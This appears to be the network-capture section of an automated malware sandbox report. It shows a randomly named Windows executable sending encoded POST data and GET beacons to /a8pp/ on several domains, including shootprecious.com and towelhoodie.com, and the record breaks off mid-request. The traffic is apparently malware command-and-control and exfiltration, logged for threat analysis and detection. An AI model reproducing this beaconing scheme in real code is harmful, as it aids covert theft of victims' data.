                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.shootprecious.com
                                        Origin: http://www.shootprecious.com
                                        Referer: http://www.shootprecious.com/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=UoIxDAENV6IVynwnYhWf5XKCVKG5q6ZzfuKyBxLWF7FcaXDC1IVcJHLWf7UFhl60DD4yp4LvIiNKQiAttiPyisigq+OZnNWqE9+RoHv9qrTVcf0RT/eFgVEHcUgojqo9T6eDI6aXLmHYTcGaCiSODtCwy6C297vhQpAawWIZ6/QDhwO+DHiPhES/GNjNKHSV9Q==
                                        Jun 4, 2024 14:36:11.351511955 CEST | 1289 | IN | HTTP/1.1 402 Payment Required
                                        Date: Tue, 04 Jun 2024 12:36:11 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        X-Sorting-Hat-PodId: 169
                                        X-Sorting-Hat-ShopId: 29847355437
                                        x-frame-options: DENY
                                        x-shopid: 29847355437
                                        x-shardid: 169
                                        x-request-id: 865b2eef-3429-407b-b813-9d6ff8e4cf9b-1717504571
                                        server-timing: processing;dur=33
                                        content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=865b2eef-3429-407b-b813-9d6ff8e4cf9b-1717504571
                                        x-content-type-options: nosniff
                                        x-download-options: noopen
                                        x-permitted-cross-domain-policies: none
                                        x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=865b2eef-3429-407b-b813-9d6ff8e4cf9b-1717504571
                                        x-dc: gcp-us-east1,gcp-us-central1,gcp-us-central1
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZYmq2LU8gCIJWWZEZfSEjqvl6WGwRSDIbE0UndZhM7y30BkB6hI0Wjm5Xn0AGGYmfbq78iNnIp9pZbO4kOlQLv1ZdeDK3ZLzUl1dtt3Sy2Jwr2mCy%2Fc1aY%2FO8C89ln6%2
                                        Jun 4, 2024 14:36:11.351542950 CEST | 257 | IN | Data Ascii: hcaEr66IzQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                        Server-Timing: cfRequestDuration;dur=111.999750
                                        Server: cloudflare
                                        CF-RAY: 88e7f791dae212db-ATL
                                        alt-svc: h3=":443"


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        26 | 192.168.11.30 | 49820 | 23.227.38.74 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:36:13.775433064 CEST | 768 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.shootprecious.com
                                        Origin: http://www.shootprecious.com
                                        Referer: http://www.shootprecious.com/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=UoIxDAENV6IVzHgnVgWf43KBL6G5jaYbfu2yBzmOEOdca3TC6sJcOHLWVbUAsF6/DD0Lp43vIiZKQjwtuV7xj8iiyOOH69WqE9+RoHLXqv/VcvERTaiGs1EAKkgow6o5T6e9I7GtLkvYTdaaBzSNItCyvqDE4YKFJq87+2kh1cIwpH/keEWNykuSaMOlIFTOgbutOkQ07x5m4okquOYWHa4=
                                        Jun 4, 2024 14:36:14.020210981 CEST | 1289 | IN | HTTP/1.1 402 Payment Required
                                        Date: Tue, 04 Jun 2024 12:36:13 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        X-Sorting-Hat-PodId: 169
                                        X-Sorting-Hat-ShopId: 29847355437
                                        x-frame-options: DENY
                                        x-shopid: 29847355437
                                        x-shardid: 169
                                        x-request-id: 3385c228-588c-422d-8655-d8a667a2c65c-1717504573
                                        server-timing: processing;dur=12
                                        content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=3385c228-588c-422d-8655-d8a667a2c65c-1717504573
                                        x-content-type-options: nosniff
                                        x-download-options: noopen
                                        x-permitted-cross-domain-policies: none
                                        x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=3385c228-588c-422d-8655-d8a667a2c65c-1717504573
                                        x-dc: gcp-us-east1,gcp-us-central1,gcp-us-central1
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XgBu%2FQsC5sbTPvNaNghq3AIByX24tCEcGIbE27zjpjC1AGGszonKEf%2B%2BImagyzUsUSXzYdTcx6Ve3f%2BfbTQvTsxs4NVOZuGnlNSfIf140IkzACM5HHx3uAxMoYtVd
                                        Jun 4, 2024 14:36:14.020225048 CEST | 259 | IN | Data Ascii: SFyOxrx1wGuA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                        Server-Timing: cfRequestDuration;dur=112.999916
                                        Server: cloudflare
                                        CF-RAY: 88e7f7a28f9e9add-MIA
                                        alt-svc: h3=":44


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        27 | 192.168.11.30 | 49821 | 23.227.38.74 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:36:16.431338072 CEST | 1685 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.shootprecious.com
                                        Origin: http://www.shootprecious.com
                                        Referer: http://www.shootprecious.com/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8= [TRUNCATED]
                                        Jun 4, 2024 14:36:16.653022051 CEST | 1289 | IN | HTTP/1.1 402 Payment Required
                                        Date: Tue, 04 Jun 2024 12:36:16 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        X-Sorting-Hat-PodId: 169
                                        X-Sorting-Hat-ShopId: 29847355437
                                        x-frame-options: DENY
                                        x-shopid: 29847355437
                                        x-shardid: 169
                                        x-request-id: 4e892528-c72c-4cf7-adb0-67afafff1779-1717504576
                                        server-timing: processing;dur=12
                                        content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=4e892528-c72c-4cf7-adb0-67afafff1779-1717504576
                                        x-content-type-options: nosniff
                                        x-download-options: noopen
                                        x-permitted-cross-domain-policies: none
                                        x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=4e892528-c72c-4cf7-adb0-67afafff1779-1717504576
                                        x-dc: gcp-us-east1,gcp-us-central1,gcp-us-central1
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6QvfOlITAkf4yMo7Na5reTc2jIKWoyFeaAnwzTm%2FDrwYjrHORkzB3V%2BF4Rm7OfxeNeU9Ekn8DjF6Xpt%2BSms98FgqWvRxqvJkHQmkiod19JUSGQSO%2Fzrjtbm2JNmMi
                                        Jun 4, 2024 14:36:16.653033972 CEST | 262 | IN | Data Ascii: w6b%2BVDj%2FIfLQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                        Server-Timing: cfRequestDuration;dur=90.999842
                                        Server: cloudflare
                                        CF-RAY: 88e7f7b32a458dc0-MIA
                                        alt-svc: h3="


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        28 | 192.168.11.30 | 49822 | 23.227.38.74 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:36:19.073797941 CEST | 471 | OUT | GET /a8pp/?2NlhHLS8=ZqgRA3RjVMUu2H0TaDCH0HK+MdKctN1/aoqoBTGPFOshE07y8/o+O03dRLUBk0uLAhE/8MrMAhZXWBIBuwTev6HTmbTiouybFpqBqX/1lMiuZO8RTLeMtxw=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.shootprecious.com
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:36:19.361792088 CEST | 1289 | IN | HTTP/1.1 301 Moved Permanently
                                        Date: Tue, 04 Jun 2024 12:36:19 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        X-Sorting-Hat-PodId: 169
                                        X-Sorting-Hat-ShopId: 29847355437
                                        X-Storefront-Renderer-Rendered: 1
                                        location: https://www.shootprecious.com/a8pp?2NlhHLS8=ZqgRA3RjVMUu2H0TaDCH0HK+MdKctN1/aoqoBTGPFOshE07y8/o+O03dRLUBk0uLAhE/8MrMAhZXWBIBuwTev6HTmbTiouybFpqBqX/1lMiuZO8RTLeMtxw=&0z=jXZhddsppL
                                        x-redirect-reason: https_required
                                        x-frame-options: DENY
                                        content-security-policy: frame-ancestors 'none';
                                        x-shopid: 29847355437
                                        x-shardid: 169
                                        vary: Accept
                                        powered-by: Shopify
                                        server-timing: processing;dur=14;desc="gc:2", db;dur=3, asn;desc="60068", edge;desc="ATL", country;desc="US", pageType;desc="404", servedBy;desc="qxt5", requestID;desc="f084c02e-1770-449e-94ab-9398108dfffc-1717504579"
                                        x-dc: gcp-us-east1,gcp-us-east1,gcp-us-east1
                                        x-request-id: f084c02e-1770-449e-94ab-9398108dfffc-1717504579
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=95wQlJXHfWwnrxkh6eIvqBpWzsvOSn8uSWk%2BOgBZkc3YRJ%2FvPlPovJTCN7sFjAdd7n%2BQX2MyW%2BfcXit1iU3UD88rM0JFwEyzf5VO%2BEiBBdqSxjrXHa5JWdkl8lGGPAJS7tsAEsG5ig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0.01,"report_
                                        Jun 4, 2024 14:36:19.361805916 CEST | 297 | IN | Data Ascii: o":"cf-nel","max_age":604800}
                                        Server-Timing: cfRequestDuration;dur=169.000149
                                        X-XSS-Protection: 1; mode=block
                                        X-Content-Type-Options: nosniff
                                        X-Permitted-Cross-Domain-Policies: none
                                        X-Download-Options: noopen
                                        Server: cloudflare
                                        CF-RAY:


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        29 | 192.168.11.30 | 49823 | 217.70.184.50 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:36:25.075710058 CEST | 763 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.cyberpsychsecurity.com
                                        Origin: http://www.cyberpsychsecurity.com
                                        Referer: http://www.cyberpsychsecurity.com/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=TodXj2sV/aTGRjcELyAF+K2UGb0r3DAMM2PV562cOMcUZsUo+sQQ7rQcVTz0ul9P73cHHAoVHrFTyICRGcYhfvgMt/cKmPu2qW3Vq4sqP8MoIvCu1otWoHyCFlv2r4zV469t9uQvI5m+f6P4MNsjHAxRpoVtxrNCdNwaRhdNK+akMWzV4QQ1+6t4b1ZN5GIbUA==
                                        Jun 4, 2024 14:36:25.285891056 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:36:25 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        30 | 192.168.11.30 | 49824 | 217.70.184.50 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:36:27.823105097 CEST | 783 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.cyberpsychsecurity.com
                                        Origin: http://www.cyberpsychsecurity.com
                                        Referer: http://www.cyberpsychsecurity.com/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=TodXj2sV/aTGTDsEYFcF1K2bK70r9jAAM2DV54ayJ+4UZNko/tQQ8rQcHzztjF967wVyHAUVHvtTyJyRHrM+e/gC2vcIovu2qW3Vq45xP8UoIaKu1NBVlnyDGlv29Izr468O9qYFI6O+f/z4LZwkJwxT3YU10eRHFZcQAjtdCNWEAhCPlTk3taRVH00l7EJAJBRJ+C0XXb9Qt6aLQmegBtY=
                                        Jun 4, 2024 14:36:28.037385941 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:36:27 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        31 | 192.168.11.30 | 49825 | 217.70.184.50 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:36:30.569041014 CEST | 1700 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.cyberpsychsecurity.com
                                        Origin: http://www.cyberpsychsecurity.com
                                        Referer: http://www.cyberpsychsecurity.com/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8= [TRUNCATED]
                                        Jun 4, 2024 14:36:30.780107975 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:36:30 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        32 | 192.168.11.30 | 49826 | 217.70.184.50 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:36:33.301645994 CEST | 476 | OUT | GET /a8pp/?2NlhHLS8=eq13gBt76ePDaE9jPC0A9Iupd/gjzDBrOAbtoaeLD+8wGtFf895L9qocKFTqmVpd7xt5UEIOF7l9ga++P+8IeJMZhOURtvON+WXuvIh3J+ggFIDS+M1ogAg=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.cyberpsychsecurity.com
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:36:33.514297009 CEST | 1289 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 04 Jun 2024 12:36:33 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        Vary: Accept-Language
                                        Data Ascii: 7bb<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>cyberpsychsecurity.com</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="h [TRUNCATED]
                                        Jun 4, 2024 14:36:33.514312983 CEST | 886 | IN
                                        Data Ascii: results of cyberpsychsecurity.com</strong></a> to get the domain’s public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class="Parking_2023-borderbox_1Gwb_"><span c
                                        Jun 4, 2024 14:36:33.514328957 CEST | 5 | IN
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        33 | 192.168.11.30 | 49827 | 91.195.240.19 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:36:55.351156950 CEST | 742 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.towelhoodie.com
                                        Origin: http://www.towelhoodie.com
                                        Referer: http://www.towelhoodie.com/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=FN4TAkjuAZBIFvLSk41+oMkOhwySyPkaxXlr0k2Y5RzHDEyVtH73gW3FX+jsKT5FYn+PBrWZ3JmX+efzb3NyBHEiCmBtavKSq4fgiHFbXLcTxvEZqy855Nzx6AFMNi+M8PmrgU9fKz67RkNZ4wRWZBXsQ0vn69kELtUS87h5BiF5hEHwGKGImO3hSZvefYXQNg==
                                        Jun 4, 2024 14:36:55.577474117 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        34 | 192.168.11.30 | 49828 | 91.195.240.19 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:36:58.111376047 CEST | 762 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.towelhoodie.com
                                        Origin: http://www.towelhoodie.com
                                        Referer: http://www.towelhoodie.com/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=FN4TAkjuAZBIU/bSo+9+pskJsgySk/kexXpr0hOI5jHHDlCVuG73t23FDujwEz5wYn6HBvWZ3JiX+evzbEVzAXEgb2BvH/KSq4fgiDkGXLETxccZrT8m0tzw9AFMJi+y8PnIgVwEK1m7RgJZ4i1ZQBWGPEutycBVEeA1xoUhFRBhkT2qbJyK1uLMOYC2daWLQo0+pnwUomXBqnwfWRHPEW0=
                                        Jun 4, 2024 14:36:58.336939096 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        35 | 192.168.11.30 | 49829 | 91.195.240.19 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:37:00.859553099 CEST | 1679 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.towelhoodie.com
                                        Origin: http://www.towelhoodie.com
                                        Referer: http://www.towelhoodie.com/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8= [TRUNCATED]
                                        Jun 4, 2024 14:37:01.084100962 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        36 | 192.168.11.30 | 49830 | 91.195.240.19 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:37:03.609122992 CEST | 469 | OUT | GET /a8pp/?2NlhHLS8=IPQzDRTPddNuZ/HMr4F9le4A0likp4cPjTBZoWar0DW2Dke1nHX7p3PJPbmWMxtVZQ2vG/Syy6/u7vfLcEQjJE0ZPWoRIvOz07zRtU0HA7dN58xUlB4x570=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.towelhoodie.com
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:37:03.833791018 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        37 | 192.168.11.30 | 49831 | 23.82.12.29 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:37:09.453222036 CEST | 766 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.seductionsessions.co.uk
                                        Origin: http://www.seductionsessions.co.uk
                                        Referer: http://www.seductionsessions.co.uk/a8pp/
                                        Content-Length: 205
